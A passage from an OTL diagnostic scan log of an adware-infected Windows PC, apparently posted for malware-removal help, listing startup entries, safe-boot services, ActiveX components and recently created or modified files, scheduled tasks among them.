Files\Adobe\ARM\1.0\AdobeARM.exe (Adobe Systems Incorporated) MsConfig - StartUpReg: [b]Aimersoft Helper Compact.exe[/b] - hkey= - key= - C:\Program Files\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe (AimerSoft) MsConfig - StartUpReg: [b]Browser companion helper[/b] - hkey= - key= - C:\Program Files\BrowserCompanion\BCHelper.exe (Blabbers Communications LTD) MsConfig - StartUpReg: [b]File Helper[/b] - hkey= - key= - C:\Program Files\File Helper\File Helper.lnk () MsConfig - StartUpReg: [b]fst_fr_83[/b] - hkey= - key= - C:\Program Files\fst_fr_83\fst_fr_83.exe () MsConfig - StartUpReg: [b]HotKeysCmds[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]HPAdvisorDock[/b] - hkey= - key= - C:\Program Files\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe () MsConfig - StartUpReg: [b]IAAnotif[/b] - hkey= - key= - C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe (Intel Corporation) MsConfig - StartUpReg: [b]IgfxTray[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]IntelliPoint[/b] - hkey= - key= - c:\Program Files\Microsoft IntelliPoint\ipoint.exe (Microsoft Corporation) MsConfig - StartUpReg: [b]ISUSPM[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]LightScribe Control Panel[/b] - hkey= - key= - C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe (Hewlett-Packard Company) MsConfig - StartUpReg: [b]PDF Complete[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]Persistence[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]QLBController[/b] - hkey= - key= - C:\Program Files\Hewlett-Packard\HP HotKey Support\QLBController.exe (Hewlett-Packard Company) MsConfig - StartUpReg: [b]ShowBatteryBar[/b] - hkey= - key= - C:\Program Files\BatteryBar\ShowBatteryBar.exe () MsConfig - StartUpReg: [b]swg[/b] - hkey= - key= - C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Google Inc.) MsConfig - StartUpReg: [b]SynTPEnh[/b] - hkey= - key= - File not found MsConfig - StartUpReg: [b]SysTrayApp[/b] - hkey= - key= - C:\Program Files\IDT\WDM\sttray.exe (IDT, Inc.) MsConfig - StartUpReg: [b]WirelessAssistant[/b] - hkey= - key= - C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe (Hewlett-Packard) MsConfig - State: "services" - 2 MsConfig - State: "startup" - 2 SafeBootMin: AppMgmt - Service SafeBootMin: Base - Driver Group SafeBootMin: Boot Bus Extender - Driver Group SafeBootMin: Boot file system - Driver Group SafeBootMin: File system - Driver Group SafeBootMin: Filter - Driver Group SafeBootMin: HelpSvc - Service SafeBootMin: NTDS - File not found SafeBootMin: PCI Configuration - Driver Group SafeBootMin: pcwatch.sys - C:\Windows\System32\drivers\pcwatch.sys () SafeBootMin: PNP Filter - Driver Group SafeBootMin: Primary disk - Driver Group SafeBootMin: sacsvr - Service SafeBootMin: SCSI Class - Driver Group SafeBootMin: System Bus Extender - Driver Group SafeBootMin: vmms - Service SafeBootMin: WinDefend - C:\Program Files\Windows Defender\mpsvc.dll (Microsoft Corporation) SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices SafeBootNet: AppMgmt - Service SafeBootNet: Base - Driver Group SafeBootNet: Boot Bus Extender - Driver Group SafeBootNet: Boot file system - Driver Group SafeBootNet: File system - Driver Group SafeBootNet: Filter - Driver Group SafeBootNet: HelpSvc - Service SafeBootNet: Messenger - Service SafeBootNet: NDIS Wrapper - Driver Group SafeBootNet: NetBIOSGroup - Driver Group SafeBootNet: NetDDEGroup - Driver Group SafeBootNet: Network - Driver Group SafeBootNet: NetworkProvider - Driver Group SafeBootNet: NTDS - File not found SafeBootNet: PCI Configuration - Driver Group SafeBootNet: PCProtect - C:\Program Files\Web Protect\PCProtect.exe (Objectify Media Inc) SafeBootNet: pcwatch.sys - C:\Windows\System32\drivers\pcwatch.sys () SafeBootNet: PNP Filter - Driver Group SafeBootNet: PNP_TDI - Driver Group SafeBootNet: Primary disk - Driver Group SafeBootNet: rdsessmgr - Service SafeBootNet: sacsvr - Service SafeBootNet: SCSI Class - Driver Group SafeBootNet: Streams Drivers - Driver Group SafeBootNet: System Bus Extender - Driver Group SafeBootNet: TDI - Driver Group SafeBootNet: vmms - Service SafeBootNet: WinDefend - C:\Program Files\Windows Defender\mpsvc.dll (Microsoft Corporation) SafeBootNet: WudfUsbccidDriver - Driver SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices ActiveX: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Program Files\Common Files\LightScribe\LSRunOnce.exe" ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0 ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {3C3901C5-3455-3E0A-A214-0B093A5070A6} - .NET Framework ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX: {4903D172-DCCB-392F-93A3-34CA9D47FE3D} - .NET Framework ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6 ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7 ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\windows\System32\ie4uinit.exe -UserConfig ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} - .NET Framework ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {D27CDB6E-AE6D-11CF-96B8-444553540000} - ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP ActiveX: >{97b59324-a6df-42c6-b5aa-c2eb21376cae} - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP Drivers32: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: MSVideo8 - C:\windows\System32\vfwwdm32.dll (Microsoft Corporation) Drivers32: vidc.cvid - C:\windows\System32\iccvid.dll (Radius Inc.) PhysicalDisk0 MBR saved to C:\PhysicalMBR.bin CREATERESTOREPOINT Restore point Set: OTL Restore Point [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2014/02/22 17:01:16 | 000,000,000 | ---D | C] -- C:\Program Files\Systweak Support Dock [2014/02/22 16:53:16 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\Advanced System Protector [2014/02/22 16:52:43 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\systweak [2014/02/22 16:52:41 | 000,000,000 | ---D | C] -- C:\Program Files\RegClean Pro [2014/02/22 16:42:14 | 000,000,000 | ---D | C] -- C:\Program Files\FindRight [2014/02/22 16:13:43 | 000,000,000 | ---D | C] -- C:\Program Files\Mozilla Maintenance Service [2014/02/22 12:12:20 | 000,000,000 | ---D | C] -- C:\ProgramData\SaveSenseLive [2014/02/22 09:29:26 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\Desktop\PB INFORMATIQUE [2014/02/22 06:51:28 | 000,000,000 | ---D | C] -- C:\Program Files\ZHPDiag [2014/02/22 06:51:28 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\ZHP [2014/02/22 06:33:37 | 000,000,000 | ---D | C] -- C:\AdwCleaner [2014/02/22 06:17:58 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes' Anti-Malware [2014/02/21 22:13:48 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\SUPERAntiSpyware.com [2014/02/21 22:13:06 | 000,000,000 | ---D | C] -- C:\ProgramData\SUPERAntiSpyware.com [2014/02/21 22:13:06 | 000,000,000 | ---D | C] -- C:\Program Files\SUPERAntiSpyware [2014/02/19 16:15:31 | 007,873,896 | ---- | C] (GSC Game World) -- C:\windows\System32\protect.dll [2014/02/19 16:15:03 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\dll-files.com [2014/02/19 16:14:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Logs [2014/02/19 16:14:45 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dll-Files Fixer [2014/02/19 16:14:44 | 000,000,000 | ---D | C] -- C:\Program Files\Dll-Files.com Fixer [2014/02/18 19:43:11 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\Desktop\Nouveau dossier [2014/02/18 11:27:27 | 000,000,000 | ---D | C] -- C:\windows\pss [2014/02/17 16:30:49 | 000,238,080 | ---- | C] (Hewlett-Packard) -- C:\windows\System32\hpbcoins32.dll [2014/02/17 16:30:37 | 000,291,840 | ---- | C] (Hewlett-Packard Corporation) -- C:\windows\System32\hpcpn117.dll [2014/02/17 16:28:51 | 000,000,000 | ---D | C] -- C:\ProgramData\HP [2014/02/16 16:57:31 | 000,000,000 | ---D | C] -- C:\windows\Migration [2014/02/16 16:15:22 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\SaveSense [2014/02/12 20:41:31 | 000,000,000 | ---D | C] -- C:\Program Files\SaveSenseLive [2014/02/12 20:39:45 | 000,293,984 | ---- | C] (Objectify Media Inc) -- C:\windows\System32\PCProtect.dll [2014/02/12 20:39:11 | 000,000,000 | ---D | C] -- C:\Program Files\Web Protect [2014/02/12 20:37:46 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\Nouveau dossier [2014/02/12 09:53:34 | 002,724,864 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\mshtml.tlb [2014/02/12 09:53:34 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieui.dll [2014/02/12 09:53:34 | 000,208,896 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ie4uinit.exe [2014/02/12 09:53:34 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieetwcollectorres.dll [2014/02/12 09:53:33 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msrating.dll [2014/02/12 09:53:33 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\iesetup.dll [2014/02/12 09:53:33 | 000,043,008 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\jsproxy.dll [2014/02/12 09:53:32 | 000,553,472 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\jscript9diag.dll [2014/02/12 09:53:32 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieUnatt.exe [2014/02/12 09:53:32 | 000,108,032 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieetwcollector.exe [2014/02/12 09:53:32 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieetwproxystub.dll [2014/02/12 09:53:32 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\iernonce.dll [2014/02/12 09:53:31 | 000,703,488 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\ieapfltr.dll [2014/02/12 09:53:31 | 000,524,288 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msfeeds.dll [2014/02/12 09:53:28 | 001,964,032 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\inetcpl.cpl [2014/02/12 09:53:25 | 004,244,480 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\jscript9.dll [2014/02/12 09:28:03 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msxml3r.dll [2014/02/12 09:27:40 | 003,419,136 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\d2d1.dll [2014/02/12 09:27:40 | 001,987,584 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\d3d10warp.dll [2014/02/12 09:27:25 | 000,594,944 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate_isv.exe [2014/02/12 09:27:25 | 000,572,416 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate.exe [2014/02/12 09:27:25 | 000,510,976 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate_ssp.exe [2014/02/12 09:27:25 | 000,508,928 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\RMActivate_ssp_isv.exe [2014/02/12 09:27:24 | 000,428,032 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc.dll [2014/02/12 09:27:24 | 000,423,936 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc_isv.dll [2014/02/12 09:27:24 | 000,390,144 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\msdrm.dll [2014/02/12 09:27:24 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc_ssp_isv.dll [2014/02/12 09:27:24 | 000,087,040 | ---- | C] (Microsoft Corporation) -- C:\windows\System32\secproc_ssp.dll [2014/02/12 09:19:46 | 000,000,000 | ---D | C] -- C:\ProgramData\UTubeAdBllOCk [2014/02/12 09:18:01 | 000,000,000 | ---D | C] -- C:\Program Files\Bench [2014/02/11 19:21:08 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\SwvUpdater [2014/02/11 19:21:05 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\.android [2014/02/11 19:21:03 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\newnext.me [2014/02/11 19:21:03 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\cache [2014/02/11 19:21:02 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\Mobogenie [2014/02/11 19:21:02 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\genienext [2014/02/11 19:20:37 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Roaming\ValueApps [2014/02/11 19:20:03 | 000,000,000 | ---D | C] -- C:\Program Files\MediaPlayerEnhance [2014/02/11 19:19:41 | 000,000,000 | ---D | C] -- C:\ProgramData\IePluginService [2014/02/11 19:19:37 | 000,000,000 | ---D | C] -- C:\Program Files\SupTab [2014/02/11 19:18:23 | 000,000,000 | ---D | C] -- C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83 [2014/02/11 19:18:22 | 000,000,000 | ---D | C] -- C:\Program Files\fst_fr_83 [2014/02/04 08:46:41 | 000,000,000 | ---D | C] -- C:\ProgramData\WinFilter [2014/01/31 18:15:17 | 000,000,000 | ---D | C] -- C:\Program Files\Adblock Plus for IE [2014/01/31 18:15:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Package Cache [2 C:\windows\*.tmp files -> C:\windows\*.tmp -> ] [1 C:\windows\System32\*.tmp files -> C:\windows\System32\*.tmp -> ] [1 C:\Users\APPE-ATELIER\*.tmp files -> C:\Users\APPE-ATELIER\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014/02/23 11:07:16 | 000,000,512 | ---- | M] () -- C:\PhysicalMBR.bin [2014/02/23 11:02:00 | 000,001,002 | ---- | M] () -- C:\windows\tasks\Google Software Updater.job [2014/02/23 10:54:47 | 000,022,688 | -H-- | M] () -- C:\windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 [2014/02/23 10:54:47 | 000,022,688 | -H-- | M] () -- C:\windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 [2014/02/23 10:47:41 | 000,001,600 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-updater.job [2014/02/23 10:47:31 | 000,002,388 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-firefoxinstaller.job [2014/02/23 10:47:26 | 000,002,102 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-chromeinstaller.job [2014/02/23 10:47:25 | 000,002,112 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-firefoxinstaller.job [2014/02/23 10:47:25 | 000,001,326 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-updater.job [2014/02/23 10:47:24 | 000,001,454 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-enabler.job [2014/02/23 10:47:19 | 000,002,422 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-validator.job [2014/02/23 10:47:14 | 000,000,928 | ---- | M] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineCore.job [2014/02/23 10:47:14 | 000,000,384 | ---- | M] () -- C:\windows\tasks\AmiUpdXp.job [2014/02/23 10:47:13 | 000,001,556 | ---- | M] () -- C:\windows\tasks\MediaPlayerEnhance-codedownloader.job [2014/02/23 10:47:13 | 000,001,150 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-enabler.job [2014/02/23 10:47:12 | 000,001,278 | ---- | M] () -- C:\windows\tasks\Plus-HD-5.7-codedownloader.job [2014/02/23 10:47:12 | 000,001,064 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job [2014/02/23 10:46:48 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat [2014/02/23 10:46:45 | 3116,646,400 | -HS- | M] () -- C:\hiberfil.sys [2014/02/22 19:37:05 | 000,001,068 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job [2014/02/22 17:29:40 | 000,000,000 | ---- | M] () -- C:\Users\APPE-ATELIER\sfc [2014/02/22 16:44:04 | 000,000,278 | ---- | M] () -- C:\windows\tasks\DLL-Files.Com Fixer_MONTHLY.job [2014/02/22 16:42:56 | 000,000,294 | ---- | M] () -- C:\windows\tasks\DLL-Files.Com Fixer_Updates.job [2014/02/22 16:20:14 | 000,000,932 | ---- | M] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineUA.job [2014/02/22 16:07:34 | 000,000,286 | ---- | M] () -- C:\windows\tasks\DLL-Files FixerASKUSER.job [2014/02/22 06:59:54 | 000,000,512 | ---- | M] () -- C:\PhysicalDisk0_MBR.bin [2014/02/22 06:14:00 | 000,000,524 | ---- | M] () -- C:\windows\tasks\SUPERAntiSpyware Scheduled Task 7d5b8c7f-bf69-4883-ae0b-c5735270b60e.job [2014/02/19 16:16:42 | 007,873,896 | ---- | M] (GSC Game World) -- C:\windows\System32\protect.dll [2014/02/19 16:14:45 | 000,001,046 | ---- | M] () -- C:\Users\Public\Desktop\Dll-Files Fixer.lnk [2014/02/19 16:02:54 | 000,759,410 | ---- | M] () -- C:\windows\System32\perfh00C.dat [2014/02/19 16:02:54 | 000,665,668 | ---- | M] () -- C:\windows\System32\perfh009.dat [2014/02/19 16:02:54 | 000,155,440 | ---- | M] () -- C:\windows\System32\perfc00C.dat [2014/02/19 16:02:54 | 000,127,084 | ---- | M] () -- C:\windows\System32\perfc009.dat [2014/02/19 10:26:01 | 000,000,346 | ---- | M] () -- C:\windows\tasks\bench-sys.job [2014/02/19 10:07:21 | 000,000,290 | RHS- | M] () -- C:\Users\APPE-ATELIER\ntuser.pol [2014/02/17 13:49:07 | 000,000,348 | ---- | M] () -- C:\windows\tasks\HPCeeScheduleForAPPE-ATELIER.job [2014/02/17 13:48:59 | 000,489,840 | ---- | M] () -- C:\windows\System32\FNTCACHE.DAT [2014/02/14 17:31:05 | 000,000,408 | ---- | M] () -- C:\windows\tasks\Maintenance en 1 clic.job [2014/02/12 20:39:55 | 000,008,800 | ---- | M] () -- C:\windows\System32\PCProtect.ini [2014/02/12 20:39:55 | 000,002,184 | ---- | M] () -- C:\windows\System32\PCProtectOff.ini [2014/02/12 13:17:06 | 000,000,290 | RHS- | M] () -- C:\ProgramData\ntuser.pol [2014/02/11 19:20:52 | 000,001,423 | ---- | M] () -- C:\Users\APPE-ATELIER\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk [2014/02/09 12:39:43 | 000,002,465 | ---- | M] () -- C:\Users\APPE-ATELIER\Desktop\36 Dictionnaires et Recueils de Correspondance.lnk [2014/02/06 11:20:26 | 002,724,864 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\mshtml.tlb [2014/02/06 11:19:55 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieetwcollectorres.dll [2014/02/06 11:01:36 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\iesetup.dll [2014/02/06 11:00:46 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieetwproxystub.dll [2014/02/06 10:52:56 | 000,043,008 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\jsproxy.dll [2014/02/06 10:52:21 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\iernonce.dll [2014/02/06 10:49:22 | 000,440,832 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieui.dll [2014/02/06 10:47:22 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieUnatt.exe [2014/02/06 10:47:18 | 000,108,032 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieetwcollector.exe [2014/02/06 10:46:27 | 000,553,472 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\jscript9diag.dll [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ie4uinit.exe [2014/02/06 10:25:43 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\msrating.dll [2014/02/06 10:25:36 | 004,244,480 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\jscript9.dll [2014/02/06 10:13:13 | 000,524,288 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\msfeeds.dll [2014/02/06 10:09:30 | 001,964,032 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\inetcpl.cpl [2014/02/06 09:34:31 | 000,703,488 | ---- | M] (Microsoft Corporation) -- C:\windows\System32\ieapfltr.dll [2014/02/04 06:36:36 | 000,033,864 | ---- | M] () -- C:\windows\Launcher.exe [2014/02/03 03:00:36 | 000,487,508 | ---- | M] () -- C:\monitor.exe [2014/01/26 21:22:00 | 000,000,334 | ---- | M] () -- C:\windows\tasks\File Helper.job [2014/01/26 16:24:12 | 000,000,127 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\WB.CFG [2 C:\windows\*.tmp files -> C:\windows\*.tmp -> ] [1 C:\windows\System32\*.tmp files -> C:\windows\System32\*.tmp -> ] [1 C:\Users\APPE-ATELIER\*.tmp files -> C:\Users\APPE-ATELIER\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014/02/23 11:07:16 | 000,000,512 | ---- | C] () -- C:\PhysicalMBR.bin [2014/02/22 17:29:40 | 000,000,000 | ---- | C] () -- C:\Users\APPE-ATELIER\sfc [2014/02/22 16:13:48 | 000,001,117 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [2014/02/22 06:59:54 | 000,000,512 | ---- | C] () -- C:\PhysicalDisk0_MBR.bin [2014/02/21 22:14:01 | 000,000,524 | ---- | C] () -- C:\windows\tasks\SUPERAntiSpyware Scheduled Task 7d5b8c7f-bf69-4883-ae0b-c5735270b60e.job [2014/02/19 16:16:46 | 000,000,286 | ---- | C] () -- C:\windows\tasks\DLL-Files FixerASKUSER.job [2014/02/19 16:15:13 | 000,000,294 | ---- | C] () -- C:\windows\tasks\DLL-Files.Com Fixer_Updates.job [2014/02/19 16:15:13 | 000,000,278 | ---- | C] () -- C:\windows\tasks\DLL-Files.Com Fixer_MONTHLY.job [2014/02/19 16:14:45 | 000,001,046 | ---- | C] () -- C:\Users\Public\Desktop\Dll-Files Fixer.lnk [2014/02/12 20:41:39 | 000,000,932 | ---- | C] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineUA.job [2014/02/12 20:41:38 | 000,000,928 | ---- | C] () -- C:\windows\tasks\SaveSenseLiveUpdateTaskMachineCore.job [2014/02/12 20:39:55 | 000,020,480 | ---- | C] () -- C:\windows\System32\drivers\pcwatch.sys [2014/02/12 20:39:55 | 000,008,800 | ---- | C] () -- C:\windows\System32\PCProtect.ini [2014/02/12 20:39:55 | 000,002,184 | ---- | C] () -- C:\windows\System32\PCProtectOff.ini [2014/02/12 09:18:02 | 000,000,346 | ---- | C] () -- C:\windows\tasks\bench-sys.job [2014/02/11 19:21:10 | 000,000,384 | ---- | C] () -- C:\windows\tasks\AmiUpdXp.job [2014/02/11 19:20:43 | 000,001,600 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-updater.job [2014/02/11 19:20:40 | 000,001,454 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-enabler.job [2014/02/11 19:20:35 | 000,001,556 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-codedownloader.job [2014/02/11 19:20:18 | 000,002,388 | ---- | C] () -- C:\windows\tasks\MediaPlayerEnhance-firefoxinstaller.job [2014/02/11 19:20:06 | 000,002,422 | ---- | C] () -- 